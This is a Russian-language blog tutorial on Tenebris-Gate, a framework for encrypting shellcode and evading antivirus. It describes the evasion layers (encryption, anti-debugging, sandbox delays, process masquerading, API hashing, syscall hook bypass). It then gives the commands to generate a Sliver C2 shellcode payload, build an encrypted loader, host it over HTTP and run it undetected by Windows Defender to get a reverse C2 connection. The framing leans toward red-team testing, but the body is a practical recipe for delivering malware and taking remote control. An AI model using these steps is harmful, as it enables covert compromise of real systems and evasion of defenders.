Tenebris-Gate используется для шифрования шеллкода и обхода обнаружения посредством многоуровневых техник уклонения.
Инструменты для уклонения появляются, привлекают внимание, а затем быстро утрачивают эффективность, как только защитники разбираются в принципах их работы. Если новый инструмент упоминается в публикациях в X или на форумах по безопасности, велика вероятность, что к моменту его применения он уже детектируется. Именно так развивается противостояние между атакующими и защитниками. Из-за столь короткого жизненного цикла большинству инструментов не уделяется должного внимания.
Тем не менее время от времени появляются инструменты, которые ещё не получили широкого распространения и по-прежнему эффективно работают. Инструмент, рассматриваемый в данной статье, относится именно к этой категории. Он называется Tenebris-Gate, и в этой статье мы разберём принцип его работы, а также то, как он может использоваться для обхода Windows Defender с целью выполнения полезной нагрузки C2.
Подпишись на наши каналы в телеграме и в Max, там ты найдешь огромное количество качественного контента, без инфошума и воды!
Что такое Tenebris-Gate
Tenebris-Gate — это многоуровневый фреймворк, предназначенный для уклонения и выполнения шеллкода без обнаружения средствами защиты. Он проводит полезную нагрузку в формате .bin через цепочку защитных механизмов, каждый из которых направлен против определённого типа анализа. На первом этапе полезная нагрузка сжимается и шифруется для устранения распознаваемых сигнатур и сокрытия содержимого от статических сканеров. Ключ шифрования маскируется с использованием IPv4-кодирования HellShell, что затрудняет его извлечение. Далее реализуется проверка на наличие отладчиков и добавляется задержка для противодействия анализу в песочницах.
Для имитации штатной системной активности Tenebris-Gate маскирует процесс под explorer.exe и избегает подозрительных импортов, через API-хеширование. На более глубоком уровне фреймворк обходит security hooks пользовательского пространства посредством модифицированных системных вызовов и аккуратно управляет памятью, избегая установки RWX флагов.
Настройка окружения
Для работы с Tenebris-Gate необходима соответствующая среда разработки Windows. В частности, потребуются Visual Studio 2022 или более новая версия, а также Windows SDK версии 10.0 или выше. Как правило, все эти компоненты устанавливаются совместно при использовании актуальных версий, например Visual Studio 2026.
Подготовка полезной нагрузки и шифрование
Первым шагом является генерация полезной нагрузки в виде шеллкода. Это можно сделать с помощью любого C2 фреймворка, однако мы воспользуемся Sliver. Для генерации полезной нагрузки выполните следующую команду в Sliver:
sliver > generate –http C2-IP –skip-symbols –os windows –format shellcode –save /home/kali/
После генерации необходимо перенести файл .bin на Windows с установленным Tenebris-Gate. Откройте Developer PowerShell для Visual Studio и перейдите в каталог Tenebris-Gate. Первым шагом является сборка проекта:
PS > msbuild SilentForge.sln /p:Configuration=Release /p:Platform=x64
После сборки проекта можно зашифровать полезную нагрузку:
PS > .BuildReleasePayloadCrypt.exe .MANUAL_MANUFACTURER.bin Loader
После завершения процесса шифрования необходимо собрать загрузчик полезной нагрузки:
PS > msbuild SilentForge.sln /p:Configuration=Release /p:Platform=x64 /t:Loader
Финальный исполняемый файл будет доступен в директории BuildRelease под именем Loader.exe. Этот файл содержит полностью обфусцированную и защищённую полезную нагрузку, готовую к доставке.
Доставка
Метод доставки полностью зависит от моделируемого сценария или цели вашего тестирования. Единого верного подхода не существует, поскольку различные среды требуют различных стратегий.
В демонстрационных целях, для размещения полезной нагрузки можно воспользоваться простым HTTP-сервером на Python. Этот подход широко распространён в реальных атаках, где злоумышленники размещают инструменты и полезные нагрузки на удаленных серверах и загружают их с помощью встроенных системных утилит. Встроенные инструменты Windows могут быть использованы в целях загрузки и выполнения подобных полезных нагрузок.
При загрузке файла Loader.exe вы заметите, что Windows Defender не классифицирует его как вредоносный.
Запуск исполняемого файла приводит к установлению обратного подключения к C2-серверу.
После этого вы получаете интерактивный доступ к целевой системе со всеми доступными модулями, имеющимися в вашем C2.
Заключение
Мир инструментов уклонения постоянно меняется, и инструменты не остаются эффективными надолго. Успех зависит от понимания внутреннего устройства операционных систем и защитных технологий. Хотя изучение публичных инструментов, таких как Tenebris-Gate, безусловно полезно, полагаться исключительно на них недостаточно. Настоящая свобода действий приходит с навыком разрабатывать собственные техники, оперативно адаптируясь к эволюции средств защиты. Специалисты такого уровня, как правило, пользуются высоким авторитетом, поскольку успех проектов во многом зависит от результатов их работы.
Подпишись на наши каналы в телеграме и в Max, там ты найдешь огромное количество качественного контента, без инфошума и воды!
